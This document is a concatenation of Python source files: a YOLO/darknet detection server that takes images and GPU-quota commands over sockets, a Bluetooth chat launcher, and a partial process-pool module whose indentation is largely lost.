import sys
import pickle
import struct
import timeit
import time
import threading
import ctypes
# generate different colors for different classes
COLORS = np.random.uniform(0, 255, size=(80,3))
def sample(probs):
s = sum(probs)
probs = [a/s for a in probs]
r = random.uniform(0, 1)
for i in range(len(probs)):
r = r - probs[i]
if r <= 0:
return i
return len(probs)-1
def c_array(ctype, values):
arr = (ctype*len(values))()
arr[:] = values
return arr
class BOX(Structure):
_fields_ = [("x", c_float),
("y", c_float),
("w", c_float),
("h", c_float)]
class DETECTION(Structure):
_fields_ = [("bbox", BOX),
("classes", c_int),
("prob", POINTER(c_float)),
("mask", POINTER(c_float)),
("objectness", c_float),
("sort_class", c_int)]
class IMAGE(Structure):
_fields_ = [("w", c_int),
("h", c_int),
("c", c_int),
("data", POINTER(c_float))]
class METADATA(Structure):
_fields_ = [("classes", c_int),
("names", POINTER(c_char_p))]
lib = CDLL("/home/vYOLO/libdarknet.so", RTLD_GLOBAL)
lib.network_width.argtypes = [c_void_p]
lib.network_width.restype = c_int
lib.network_height.argtypes = [c_void_p]
lib.network_height.restype = c_int
predict = lib.network_predict
predict.argtypes = [c_void_p, POINTER(c_float)]
predict.restype = POINTER(c_float)
set_gpu = lib.cuda_set_device
set_gpu.argtypes = [c_int]
make_image = lib.make_image
make_image.argtypes = [c_int, c_int, c_int]
make_image.restype = IMAGE
get_network_boxes = lib.get_network_boxes
get_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int)]
get_network_boxes.restype = POINTER(DETECTION)
make_network_boxes = lib.make_network_boxes
make_network_boxes.argtypes = [c_void_p]
make_network_boxes.restype = POINTER(DETECTION)
free_detections = lib.free_detections
free_detections.argtypes = [POINTER(DETECTION), c_int]
free_ptrs = lib.free_ptrs
free_ptrs.argtypes = [POINTER(c_void_p), c_int]
network_predict = lib.network_predict
network_predict.argtypes = [c_void_p, POINTER(c_float)]
reset_rnn = lib.reset_rnn
reset_rnn.argtypes = [c_void_p]
load_net = lib.load_network
load_net.argtypes = [c_char_p, c_char_p, c_int]
load_net.restype = c_void_p
do_nms_obj = lib.do_nms_obj
do_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
do_nms_sort = lib.do_nms_sort
do_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
free_image = lib.free_image
free_image.argtypes = [IMAGE]
letterbox_image = lib.letterbox_image
letterbox_image.argtypes = [IMAGE, c_int, c_int]
letterbox_image.restype = IMAGE
load_meta = lib.get_metadata
lib.get_metadata.argtypes = [c_char_p]
lib.get_metadata.restype = METADATA
load_image = lib.load_image_color
load_image.argtypes = [c_char_p, c_int, c_int]
load_image.restype = IMAGE
rgbgr_image = lib.rgbgr_image
rgbgr_image.argtypes = [IMAGE]
predict_image = lib.network_predict_image
predict_image.argtypes = [c_void_p, IMAGE, c_int]
predict_image.restype = POINTER(c_float)
#def classify(net, meta, im):
# out = predict_image(net, im)
# res = []
# for i in range(meta.classes):
# res.append((meta.names[i], out[i]))
# res = sorted(res, key=lambda x: -x[1])
# return res
### modified ###
HOST=''
USER_PORT=9001
CTL_PORT=11111
BUFFER_SIZE = 256
QUATO = 100
num_points = 2
wait_time = 0.01
Latency = []
Count = 0
def threading_controller(controller):
global QUATO
global Latency
print ("entered controller threading.", controller)
while True:
recv_data = controller.recv(ctypes.sizeof(ctypes.c_double)*BUFFER_SIZE)
if len(recv_data)<=0: break
data = np.frombuffer(recv_data, dtype=np.double)
#print(data)
QUATO = int(data[0])
print('GPU virtual resource is ' + str(QUATO))
Latency = []
while len(Latency) < num_points: time.sleep(wait_time)
assert(len(Latency) >= num_points) # make sure there is data in Latency
send_data = np.mean(Latency[1:]) * np.ones(BUFFER_SIZE, dtype=np.double)
#try to send data, if error break
controller.sendall(send_data)
# if controller drop, then close and re-accept
controller.close()
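# A minimal sketch of the matching controller side of this exchange (the server
# address and the quota value of 80 are assumptions): the controller sends
# BUFFER_SIZE doubles whose first element is the new GPU quota, then reads back
# BUFFER_SIZE doubles containing the measured mean latency.
#
#   ctl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   ctl.connect(('<server-ip>', CTL_PORT))
#   ctl.sendall(np.full(BUFFER_SIZE, 80.0, dtype=np.double).tobytes())
#   mean_latency = np.frombuffer(ctl.recv(ctypes.sizeof(ctypes.c_double) * BUFFER_SIZE), dtype=np.double)[0]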
def connect_controller():
ctl = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
ctl.bind((HOST, CTL_PORT))
ctl.listen(10)
print('Controller Socket now listening')
while True:
controller, ctl_addr = ctl.accept()
print("Get new controller socket" + str(ctl_addr))
# start the thread darknet
threads = threading.Thread(target=threading_controller, args=(controller,))
threads.start()
def recv_image_from_socket(client):
buffers = b''
while len(buffers)<4:
try:
buf = client.recv(4-len(buffers))
except:
return False
buffers += buf
size, = struct.unpack('!i', buffers)
#print "receiving %d bytes" % size
recv_data = b''
while len(recv_data) < size:
try:
data = client.recv(1024)
except:
return False
recv_data += data
frame_data = recv_data[:size]
#recv_data = recv_data[size:]
imgdata = np.frombuffer(frame_data, dtype='uint8')
decimg = cv2.imdecode(imgdata,1)
return decimg
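# A minimal sketch of what a client is expected to send per frame (the frame
# source and socket are assumptions): a 4-byte big-endian length prefix followed
# by the JPEG-encoded image bytes, matching the struct.unpack('!i', ...) above.
#
#   ok, jpeg = cv2.imencode('.jpg', frame)
#   payload = jpeg.tobytes()
#   sock.sendall(struct.pack('!i', len(payload)) + payload)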
def detect(net, meta, image, quato, thresh=.5, hier_thresh=.5, nms=.45):
# GET C,H,W, and DATA values
img = image.transpose(2, 0, 1)
c, h, w = img.shape[0], img.shape[1], img.shape[2]
nump_data = img.ravel() / 255.0
nump_data = np.ascontiguousarray(nump_data, dtype=np.float32)
# make c_type pointer to numpy array
ptr_data = nump_data.ctypes.data_as(POINTER(c_float))
# make IMAGE data type
im = IMAGE(w=w, h=h, c=c, data=ptr_data)
num = c_int(0)
pnum = pointer(num)
predict_image(net, im, quato)
dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum)
num = pnum[0]
if nms: do_nms_obj(dets, num, meta.classes, nms)
res = []
for j in range(num):
for i in range(meta.classes):
if dets[j].prob[i] > 0:
b = dets[j].bbox
classid = i
classname = meta.names[i].decode('UTF-8')
res.append((classname, dets[j].prob[i], (b.x, b.y, b.w, b.h), classid))
res = sorted(res, key=lambda x: -x[1])
#free_image(im)
free_detections(dets, num)
return res
# display the pic after detecting
def showPicResult(r,im):
for i in range(len(r)):
x1=r[i][2][0]-r[i][2][2]/2
y1=r[i][2][1]-r[i][2][3]/2
x2=r[i][2][0]+r[i][2][2]/2
y2=r[i][2][1]+r[i][2][3]/2
color = COLORS[r[i][3]]
cv2.rectangle(im,(int(x1),int(y1)),(int(x2),int(y2)),color,2)
#putText
x3 = int(x1+5)
y3 = int(y1-10)
font = cv2.FONT_HERSHEY_SIMPLEX
text = "{}: {:.4f}".format(str(r[i][0]), float(r[i][1]))
        if ((x3<=im.shape[1]) and (y3>=0)):
            cv2.putText(im, text, (x3,y3), font, 0.5, color, 1, cv2.LINE_AA)
        else:
            cv2.putText(im, text, (int(x1),int(y1+6)), font, 0.5, color, 1, cv2.LINE_AA)
cv2.imshow('Detection Window', im)
cv2.waitKey(0)
#cv2.destroyAllWindows()
if __name__ == "__main__":
t1 = threading.Thread(target = connect_controller)
t1.setDaemon(True)
t1.start()
# detect_net = load_net(b"./cfg/yolov3-tiny.cfg", b"yolov3-tiny.weights", 0)
# detect_net = load_net(b"./cfg/yolov3-416.cfg", b"yolov3.weights", 0)
detect_net = load_net(b"./cfg/yolov3-608.cfg", b"yolov3.weights", 0)
detect_meta = load_meta(b"cfg/coco.data")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind((HOST,USER_PORT))
s.listen(10)
while True:
client,addr=s.accept()
print ("Get new user socket")
StartTime = time.time()
while True:
decimg = recv_image_from_socket(client)
if decimg is False:
print("client droped, break, waiting other clients")
break
result = detect(detect_net, detect_meta, decimg, QUATO, thresh=0.7)
Latency.append(time.time() - StartTime)
print(str(time.time() - StartTime))
#print(result)
#time.sleep(1)
str1 = '0'+'\n'
client.sendall(str1.encode())
StartTime = time.time()
        # if the client drops, close and re-accept
client.close()
|
run.py
|
import logging
import os
import signal
import threading
import sys
import time
from queue import Queue
from src.GUI.gui import MainWindow
from src.bluetooth_node.blue_node import BlueNode
from src.handler.handler import Handler
from src.monitor.monitor import Monitor
from options import Args
def read_key_val_file(name):
"""
    Read a file of key=value pairs (one per line) and return them as a
    dictionary of strings.
"""
settings = {}
with open(name, "r") as f:
for line in f:
            key, val = line.strip().split("=", 1)
settings[key] = val
return settings
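# Example settings.cfg (illustrative values only; these are the keys read in
# main() below):
#
#   server_uuid=94f39d29-7d6d-437d-973b-fba39e49d4ee
#   baddr=00:11:22:33:44:55
#   monitoring=0
#   monitoring_ip=127.0.0.1
#   monitoring_port=5000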
def setup_dirs():
dirs = ["logs", "data"]
for dir in dirs:
if not os.path.exists(dir):
os.makedirs(dir)
def main():
setup_dirs()
# Create a logger.
logging.basicConfig(
level=logging.DEBUG,
format="%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s",
handlers=[
logging.FileHandler("logs/error.log"),
logging.StreamHandler()
]
)
settings = read_key_val_file("settings.cfg")
logging.debug("sys.argv: {}".format(sys.argv))
if len(sys.argv) == 4:
mac, _, port = sys.argv[Args.simulation].split('+')[0].split('-')
title = mac + " at " + port
settings["baddr"] = mac
else:
title = "A simple chat"
logging.info("Settings: {}".format(settings))
run_monitoring = bool(int(settings["monitoring"]))
if not run_monitoring and bool(int(sys.argv[Args.monitoring])):
run_monitoring = True
    # Create queues for data to be sent to and read from.
data_queue = Queue()
input_gui_queue = Queue()
output_gui_queue = Queue()
node = BlueNode(settings["server_uuid"], data_queue, settings["baddr"])
window = MainWindow(input_gui_queue, output_gui_queue, title)
handler = Handler(data_queue, input_gui_queue, output_gui_queue, node, settings["baddr"])
# Start first thread for Bluetooth nodes.
thread = threading.Thread(target=node.run, name="BlueNode")
thread.daemon = True
thread.start()
logging.info("Started BlueNode")
# Start second thread for the handler.
handler_thread = threading.Thread(target=handler.run, name="Handler")
handler_thread.daemon = True
handler_thread.start()
logging.info("Starting Handler Queue")
# Oh no...
global monitor
monitor = None
if run_monitoring:
monitor = Monitor(settings["monitoring_ip"], int(settings["monitoring_port"]), settings["baddr"], node)
# Start interface in thread
monitor_thread = threading.Thread(target=monitor.run, name="Monitor")
monitor_thread.daemon = True
monitor_thread.start()
logging.info("Starting GUI")
signal.signal(signal.SIGTERM, close_gracefully)
window.run()
    if monitor is not None:
        monitor.running = False
def close_gracefully(signal, stacktrace):
global monitor
    if monitor is not None:
        monitor.running = False
# Give the monitor enough time to write to file.
time.sleep(1)
exit()
if __name__ == "__main__":
print("sys.argv len: {}".format(sys.argv))
if len(sys.argv) < 3:
print(open("failure", "r").read())
else:
main()
|
pool.py
|
# -*- coding: utf-8 -*-
#
# Module providing the `Pool` class for managing a process pool
#
# multiprocessing/pool.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
#
# Imports
#
import copy
import errno
import itertools
import os
import platform
import signal
import sys
import threading
import time
import warnings
from collections import deque
from functools import partial
from . import cpu_count, get_context
from . import util
from .common import (
TERM_SIGNAL, human_status, pickle_loads, reset_signals, restart_state,
)
from .compat import get_errno, mem_rss, send_offset
from .einfo import ExceptionInfo
from .dummy import DummyProcess
from .exceptions import (
CoroStop,
RestartFreqExceeded,
SoftTimeLimitExceeded,
Terminated,
TimeLimitExceeded,
TimeoutError,
WorkerLostError,
)
from .five import Empty, Queue, range, values, reraise, monotonic
from .util import Finalize, debug, warning
MAXMEM_USED_FMT = """\
child process exiting after exceeding memory limit ({0}KiB / {1}KiB)
"""
PY3 = sys.version_info[0] == 3
if platform.system() == 'Windows': # pragma: no cover
    # On Windows os.kill calls TerminateProcess, which cannot be
    # handled by any process, so this is needed to terminate the task
    # *and its children* (if any).
from ._win import kill_processtree as _kill # noqa
SIGKILL = TERM_SIGNAL
else:
from os import kill as _kill # noqa
SIGKILL = signal.SIGKILL
try:
TIMEOUT_MAX = threading.TIMEOUT_MAX
except AttributeError: # pragma: no cover
TIMEOUT_MAX = 1e10 # noqa
if sys.version_info >= (3, 3):
_Semaphore = threading.Semaphore
else:
# Semaphore is a factory function pointing to _Semaphore
_Semaphore = threading._Semaphore # noqa
#
# Constants representing the state of a pool
#
RUN = 0
CLOSE = 1
TERMINATE = 2
#
# Constants representing the state of a job
#
ACK = 0
READY = 1
TASK = 2
NACK = 3
DEATH = 4
#
# Exit code constants
#
EX_OK = 0
EX_FAILURE = 1
EX_RECYCLE = 0x9B
# Signal used for soft time limits.
SIG_SOFT_TIMEOUT = getattr(signal, "SIGUSR1", None)
#
# Miscellaneous
#
LOST_WORKER_TIMEOUT = 10.0
EX_OK = getattr(os, "EX_OK", 0)
GUARANTEE_MESSAGE_CONSUMPTION_RETRY_LIMIT = 300
GUARANTEE_MESSAGE_CONSUMPTION_RETRY_INTERVAL = 0.1
job_counter = itertools.count()
Lock = threading.Lock
def _get_send_offset(connection):
try:
native = connection.send_offset
except AttributeError:
native = None
if native is None:
return partial(send_offset, connection.fileno())
return native
def mapstar(args):
return list(map(*args))
def starmapstar(args):
return list(itertools.starmap(args[0], args[1]))
def error(msg, *args, **kwargs):
util.get_logger().error(msg, *args, **kwargs)
def stop_if_not_current(thread, timeout=None):
if thread is not threading.current_thread():
thread.stop(timeout)
class LaxBoundedSemaphore(_Semaphore):
"""Semaphore that checks that # release is <= # acquires,
but ignores if # releases >= value."""
def shrink(self):
self._initial_value -= 1
self.acquire()
if PY3:
def __init__(self, value=1, verbose=None):
_Semaphore.__init__(self, value)
self._initial_value = value
def grow(self):
with self._cond:
self._initial_value += 1
self._value += 1
self._cond.notify()
def release(self):
cond = self._cond
with cond:
if self._value < self._initial_value:
self._value += 1
cond.notify_all()
def clear(self):
while self._value < self._initial_value:
_Semaphore.release(self)
else:
def __init__(self, value=1, verbose=None):
_Semaphore.__init__(self, value, verbose)
self._initial_value = value
def grow(self):
cond = self._Semaphore__cond
with cond:
self._initial_value += 1
self._Semaphore__value += 1
cond.notify()
def release(self): # noqa
cond = self._Semaphore__cond
with cond:
if self._Semaphore__value < self._initial_value:
self._Semaphore__value += 1
cond.notifyAll()
def clear(self): # noqa
while self._Semaphore__value < self._initial_value:
_Semaphore.release(self)
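# The pool uses this semaphore as its putlock: one permit per worker process.
# apply_async() may acquire a permit before dispatching, the result handler
# releases it when a job completes, and grow()/shrink() adjust it together
# with the number of workers.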
#
# Exceptions
#
class MaybeEncodingError(Exception):
"""Wraps possible unpickleable errors, so they can be
safely sent through the socket."""
def __init__(self, exc, value):
self.exc = repr(exc)
self.value = repr(value)
super(MaybeEncodingError, self).__init__(self.exc, self.value)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, str(self))
def __str__(self):
return "Error sending result: '%r'. Reason: '%r'." % (
self.value, self.exc)
class WorkersJoined(Exception):
"""All workers have terminated."""
def soft_timeout_sighandler(signum, frame):
raise SoftTimeLimitExceeded()
#
# Code run by worker processes
#
class Worker(object):
def __init__(self, inq, outq, synq=None, initializer=None, initargs=(),
maxtasks=None, sentinel=None, on_exit=None,
sigprotection=True, wrap_exception=True,
max_memory_per_child=None, on_ready_counter=None):
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
self.initializer = initializer
self.initargs = initargs
self.maxtasks = maxtasks
self.max_memory_per_child = max_memory_per_child
self._shutdown = sentinel
self.on_exit = on_exit
self.sigprotection = sigprotection
self.inq, self.outq, self.synq = inq, outq, synq
self.wrap_exception = wrap_exception # XXX cannot disable yet
self.on_ready_counter = on_ready_counter
self.contribute_to_object(self)
def contribute_to_object(self, obj):
obj.inq, obj.outq, obj.synq = self.inq, self.outq, self.synq
obj.inqW_fd = self.inq._writer.fileno() # inqueue write fd
obj.outqR_fd = self.outq._reader.fileno() # outqueue read fd
if self.synq:
obj.synqR_fd = self.synq._reader.fileno() # synqueue read fd
obj.synqW_fd = self.synq._writer.fileno() # synqueue write fd
obj.send_syn_offset = _get_send_offset(self.synq._writer)
else:
obj.synqR_fd = obj.synqW_fd = obj._send_syn_offset = None
obj._quick_put = self.inq._writer.send
obj._quick_get = self.outq._reader.recv
obj.send_job_offset = _get_send_offset(self.inq._writer)
return obj
def __reduce__(self):
return self.__class__, (
self.inq, self.outq, self.synq, self.initializer,
self.initargs, self.maxtasks, self._shutdown, self.on_exit,
self.sigprotection, self.wrap_exception, self.max_memory_per_child,
)
def __call__(self):
_exit = sys.exit
_exitcode = [None]
def exit(status=None):
_exitcode[0] = status
return _exit(status)
sys.exit = exit
pid = os.getpid()
self._make_child_methods()
self.after_fork()
self.on_loop_start(pid=pid) # callback on loop start
try:
sys.exit(self.workloop(pid=pid))
except Exception as exc:
error('Pool process %r error: %r', self, exc, exc_info=1)
self._do_exit(pid, _exitcode[0], exc)
finally:
self._do_exit(pid, _exitcode[0], None)
def _do_exit(self, pid, exitcode, exc=None):
if exitcode is None:
exitcode = EX_FAILURE if exc else EX_OK
if self.on_exit is not None:
self.on_exit(pid, exitcode)
if sys.platform != 'win32':
try:
self.outq.put((DEATH, (pid, exitcode)))
time.sleep(1)
finally:
os._exit(exitcode)
else:
os._exit(exitcode)
def on_loop_start(self, pid):
pass
def prepare_result(self, result):
return result
def workloop(self, debug=debug, now=monotonic, pid=None):
pid = pid or os.getpid()
put = self.outq.put
inqW_fd = self.inqW_fd
synqW_fd = self.synqW_fd
maxtasks = self.maxtasks
max_memory_per_child = self.max_memory_per_child or 0
prepare_result = self.prepare_result
wait_for_job = self.wait_for_job
_wait_for_syn = self.wait_for_syn
def wait_for_syn(jid):
i = 0
while 1:
if i > 60:
error('!!!WAIT FOR ACK TIMEOUT: job:%r fd:%r!!!',
jid, self.synq._reader.fileno(), exc_info=1)
req = _wait_for_syn()
if req:
type_, args = req
if type_ == NACK:
return False
assert type_ == ACK
return True
i += 1
completed = 0
try:
while maxtasks is None or (maxtasks and completed < maxtasks):
req = wait_for_job()
if req:
type_, args_ = req
assert type_ == TASK
job, i, fun, args, kwargs = args_
put((ACK, (job, i, now(), pid, synqW_fd)))
if _wait_for_syn:
confirm = wait_for_syn(job)
if not confirm:
continue # received NACK
try:
result = (True, prepare_result(fun(*args, **kwargs)))
except Exception:
result = (False, ExceptionInfo())
try:
put((READY, (job, i, result, inqW_fd)))
except Exception as exc:
_, _, tb = sys.exc_info()
try:
wrapped = MaybeEncodingError(exc, result[1])
einfo = ExceptionInfo((
MaybeEncodingError, wrapped, tb,
))
put((READY, (job, i, (False, einfo), inqW_fd)))
finally:
del(tb)
completed += 1
if max_memory_per_child > 0:
used_kb = mem_rss()
if used_kb <= 0:
error('worker unable to determine memory usage')
if used_kb > 0 and used_kb > max_memory_per_child:
warning(MAXMEM_USED_FMT.format(
used_kb, max_memory_per_child))
return EX_RECYCLE
debug('worker exiting after %d tasks', completed)
if maxtasks:
return EX_RECYCLE if completed == maxtasks else EX_FAILURE
return EX_OK
finally:
            # Before exiting the worker, we want to ensure that all
# messages produced by the worker have been consumed by the main
# process. This prevents the worker being terminated prematurely
# and messages being lost.
self._ensure_messages_consumed(completed=completed)
def _ensure_messages_consumed(self, completed):
""" Returns true if all messages sent out have been received and
consumed within a reasonable amount of time """
if not self.on_ready_counter:
return False
for retry in range(GUARANTEE_MESSAGE_CONSUMPTION_RETRY_LIMIT):
if self.on_ready_counter.value >= completed:
debug('ensured messages consumed after %d retries', retry)
return True
time.sleep(GUARANTEE_MESSAGE_CONSUMPTION_RETRY_INTERVAL)
warning('could not ensure all messages were consumed prior to '
'exiting')
return False
def after_fork(self):
if hasattr(self.inq, '_writer'):
self.inq._writer.close()
if hasattr(self.outq, '_reader'):
self.outq._reader.close()
if self.initializer is not None:
self.initializer(*self.initargs)
# Make sure all exiting signals call finally: blocks.
# This is important for the semaphore to be released.
reset_signals(full=self.sigprotection)
# install signal handler for soft timeouts.
if SIG_SOFT_TIMEOUT is not None:
signal.signal(SIG_SOFT_TIMEOUT, soft_timeout_sighandler)
try:
signal.signal(signal.SIGINT, signal.SIG_IGN)
except AttributeError:
pass
def _make_recv_method(self, conn):
get = conn.get
if hasattr(conn, '_reader'):
_poll = conn._reader.poll
if hasattr(conn, 'get_payload') and conn.get_payload:
get_payload = conn.get_payload
def _recv(timeout, loads=pickle_loads):
return True, loads(get_payload())
else:
def _recv(timeout): # noqa
if _poll(timeout):
return True, get()
return False, None
else:
def _recv(timeout): # noqa
try:
return True, get(timeout=timeout)
except Queue.Empty:
return False, None
return _recv
def _make_child_methods(self, loads=pickle_loads):
self.wait_for_job = self._make_protected_receive(self.inq)
self.wait_for_syn = (self._make_protected_receive(self.synq)
if self.synq else None)
def _make_protected_receive(self, conn):
_receive = self._make_recv_method(conn)
should_shutdown = self._shutdown.is_set if self._shutdown else None
def receive(debug=debug):
if should_shutdown and should_shutdown():
debug('worker got sentinel -- exiting')
raise SystemExit(EX_OK)
try:
ready, req = _receive(1.0)
if not ready:
return None
except (EOFError, IOError) as exc:
if get_errno(exc) == errno.EINTR:
return None # interrupted, maybe by gdb
debug('worker got %s -- exiting', type(exc).__name__)
raise SystemExit(EX_FAILURE)
if req is None:
debug('worker got sentinel -- exiting')
raise SystemExit(EX_FAILURE)
return req
return receive
#
# Class representing a process pool
#
class PoolThread(DummyProcess):
def __init__(self, *args, **kwargs):
DummyProcess.__init__(self)
self._state = RUN
self._was_started = False
self.daemon = True
def run(self):
try:
return self.body()
except RestartFreqExceeded as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
_kill(os.getpid(), TERM_SIGNAL)
sys.exit()
except Exception as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
os._exit(1)
def start(self, *args, **kwargs):
self._was_started = True
super(PoolThread, self).start(*args, **kwargs)
def on_stop_not_started(self):
pass
def stop(self, timeout=None):
if self._was_started:
self.join(timeout)
return
self.on_stop_not_started()
def terminate(self):
self._state = TERMINATE
def close(self):
self._state = CLOSE
class Supervisor(PoolThread):
def __init__(self, pool):
self.pool = pool
super(Supervisor, self).__init__()
def body(self):
debug('worker handler starting')
time.sleep(0.8)
pool = self.pool
try:
# do a burst at startup to verify that we can start
# our pool processes, and in that time we lower
# the max restart frequency.
prev_state = pool.restart_state
pool.restart_state = restart_state(10 * pool._processes, 1)
for _ in range(10):
if self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.1)
            # Keep maintaining workers until the cache gets drained, unless
            # the pool is terminated
pool.restart_state = prev_state
while self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.8)
except RestartFreqExceeded:
pool.close()
pool.join()
raise
debug('worker handler exiting')
class TaskHandler(PoolThread):
def __init__(self, taskqueue, put, outqueue, pool, cache):
self.taskqueue = taskqueue
self.put = put
self.outqueue = outqueue
self.pool = pool
self.cache = cache
super(TaskHandler, self).__init__()
def body(self):
cache = self.cache
taskqueue = self.taskqueue
put = self.put
for taskseq, set_length in iter(taskqueue.get, None):
task = None
i = -1
try:
for i, task in enumerate(taskseq):
if self._state:
debug('task handler found thread._state != RUN')
break
try:
put(task)
except IOError:
debug('could not put task on queue')
break
except Exception:
job, ind = task[:2]
try:
cache[job]._set(ind, (False, ExceptionInfo()))
except KeyError:
pass
else:
if set_length:
debug('doing set_length()')
set_length(i + 1)
continue
break
except Exception:
job, ind = task[:2] if task else (0, 0)
if job in cache:
cache[job]._set(ind + 1, (False, ExceptionInfo()))
if set_length:
util.debug('doing set_length()')
set_length(i + 1)
else:
debug('task handler got sentinel')
self.tell_others()
def tell_others(self):
outqueue = self.outqueue
put = self.put
pool = self.pool
try:
# tell result handler to finish when cache is empty
debug('task handler sending sentinel to result handler')
outqueue.put(None)
# tell workers there is no more work
debug('task handler sending sentinel to workers')
for p in pool:
put(None)
except IOError:
debug('task handler got IOError when sending sentinels')
debug('task handler exiting')
def on_stop_not_started(self):
self.tell_others()
class TimeoutHandler(PoolThread):
def __init__(self, processes, cache, t_soft, t_hard):
self.processes = processes
self.cache = cache
self.t_soft = t_soft
self.t_hard = t_hard
self._it = None
super(TimeoutHandler, self).__init__()
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self.processes)
if proc.pid == pid
), (None, None))
def on_soft_timeout(self, job):
debug('soft time limit exceeded for %r', job)
process, _index = self._process_by_pid(job._worker_pid)
if not process:
return
# Run timeout callback
job.handle_timeout(soft=True)
try:
_kill(job._worker_pid, SIG_SOFT_TIMEOUT)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
def on_hard_timeout(self, job):
if job.ready():
return
debug('hard time limit exceeded for %r', job)
# Remove from cache and set return value to an exception
try:
raise TimeLimitExceeded(job._timeout)
except TimeLimitExceeded:
job._set(job._job, (False, ExceptionInfo()))
else: # pragma: no cover
pass
# Remove from _pool
process, _index = self._process_by_pid(job._worker_pid)
# Run timeout callback
job.handle_timeout(soft=False)
if process:
self._trywaitkill(process)
def _trywaitkill(self, worker):
debug('timeout: sending TERM to %s', worker._name)
try:
if os.getpgid(worker.pid) == worker.pid:
debug("worker %s is a group leader. It is safe to kill (SIGTERM) the whole group", worker.pid)
os.killpg(os.getpgid(worker.pid), signal.SIGTERM)
else:
worker.terminate()
except OSError:
pass
else:
if worker._popen.wait(timeout=0.1):
return
debug('timeout: TERM timed-out, now sending KILL to %s', worker._name)
try:
if os.getpgid(worker.pid) == worker.pid:
debug("worker %s is a group leader. It is safe to kill (SIGKILL) the whole group", worker.pid)
os.killpg(os.getpgid(worker.pid), signal.SIGKILL)
else:
_kill(worker.pid, SIGKILL)
except OSError:
pass
def handle_timeouts(self):
t_hard, t_soft = self.t_hard, self.t_soft
dirty = set()
on_soft_timeout = self.on_soft_timeout
on_hard_timeout = self.on_hard_timeout
def _timed_out(start, timeout):
if not start or not timeout:
return False
if monotonic() >= start + timeout:
return True
# Inner-loop
while self._state == RUN:
# Perform a shallow copy before iteration because keys can change.
# A deep copy fails (on shutdown) due to thread.lock objects.
# https://github.com/celery/billiard/issues/260
cache = copy.copy(self.cache)
# Remove dirty items not in cache anymore
if dirty:
dirty = set(k for k in dirty if k in cache)
for i, job in cache.items():
ack_time = job._time_accepted
soft_timeout = job._soft_timeout
if soft_timeout is None:
soft_timeout = t_soft
hard_timeout = job._timeout
if hard_timeout is None:
hard_timeout = t_hard
if _timed_out(ack_time, hard_timeout):
on_hard_timeout(job)
elif i not in dirty and _timed_out(ack_time, soft_timeout):
on_soft_timeout(job)
dirty.add(i)
yield
def body(self):
while self._state == RUN:
try:
for _ in self.handle_timeouts():
time.sleep(1.0) # don't spin
except CoroStop:
break
debug('timeout handler exiting')
def handle_event(self, *args):
if self._it is None:
self._it = self.handle_timeouts()
try:
next(self._it)
except StopIteration:
self._it = None
class ResultHandler(PoolThread):
def __init__(self, outqueue, get, cache, poll,
join_exited_workers, putlock, restart_state,
check_timeouts, on_job_ready, on_ready_counters=None):
self.outqueue = outqueue
self.get = get
self.cache = cache
self.poll = poll
self.join_exited_workers = join_exited_workers
self.putlock = putlock
self.restart_state = restart_state
self._it = None
self._shutdown_complete = False
self.check_timeouts = check_timeouts
self.on_job_ready = on_job_ready
self.on_ready_counters = on_ready_counters
self._make_methods()
super(ResultHandler, self).__init__()
def on_stop_not_started(self):
# used when pool started without result handler thread.
self.finish_at_shutdown(handle_timeouts=True)
def _make_methods(self):
cache = self.cache
putlock = self.putlock
restart_state = self.restart_state
on_job_ready = self.on_job_ready
def on_ack(job, i, time_accepted, pid, synqW_fd):
restart_state.R = 0
try:
cache[job]._ack(i, time_accepted, pid, synqW_fd)
except (KeyError, AttributeError):
                # Object gone or doesn't support _ack (e.g. IMapIterator).
pass
def on_ready(job, i, obj, inqW_fd):
if on_job_ready is not None:
on_job_ready(job, i, obj, inqW_fd)
try:
item = cache[job]
except KeyError:
return
if self.on_ready_counters:
worker_pid = next(iter(item.worker_pids()), None)
if worker_pid and worker_pid in self.on_ready_counters:
on_ready_counter = self.on_ready_counters[worker_pid]
with on_ready_counter.get_lock():
on_ready_counter.value += 1
if not item.ready():
if putlock is not None:
putlock.release()
try:
item._set(i, obj)
except KeyError:
pass
def on_death(pid, exitcode):
try:
os.kill(pid, TERM_SIGNAL)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
state_handlers = self.state_handlers = {
ACK: on_ack, READY: on_ready, DEATH: on_death
}
def on_state_change(task):
state, args = task
try:
state_handlers[state](*args)
except KeyError:
debug("Unknown job state: %s (args=%s)", state, args)
self.on_state_change = on_state_change
def _process_result(self, timeout=1.0):
poll = self.poll
on_state_change = self.on_state_change
while 1:
try:
ready, task = poll(timeout)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
raise CoroStop()
if self._state:
assert self._state == TERMINATE
debug('result handler found thread._state=TERMINATE')
raise CoroStop()
if ready:
if task is None:
debug('result handler got sentinel')
raise CoroStop()
on_state_change(task)
if timeout != 0: # blocking
break
else:
break
yield
def handle_event(self, fileno=None, events=None):
if self._state == RUN:
if self._it is None:
self._it = self._process_result(0) # non-blocking
try:
next(self._it)
except (StopIteration, CoroStop):
self._it = None
def body(self):
debug('result handler starting')
try:
while self._state == RUN:
try:
for _ in self._process_result(1.0): # blocking
pass
except CoroStop:
break
finally:
self.finish_at_shutdown()
def finish_at_shutdown(self, handle_timeouts=False):
self._shutdown_complete = True
get = self.get
outqueue = self.outqueue
cache = self.cache
poll = self.poll
join_exited_workers = self.join_exited_workers
check_timeouts = self.check_timeouts
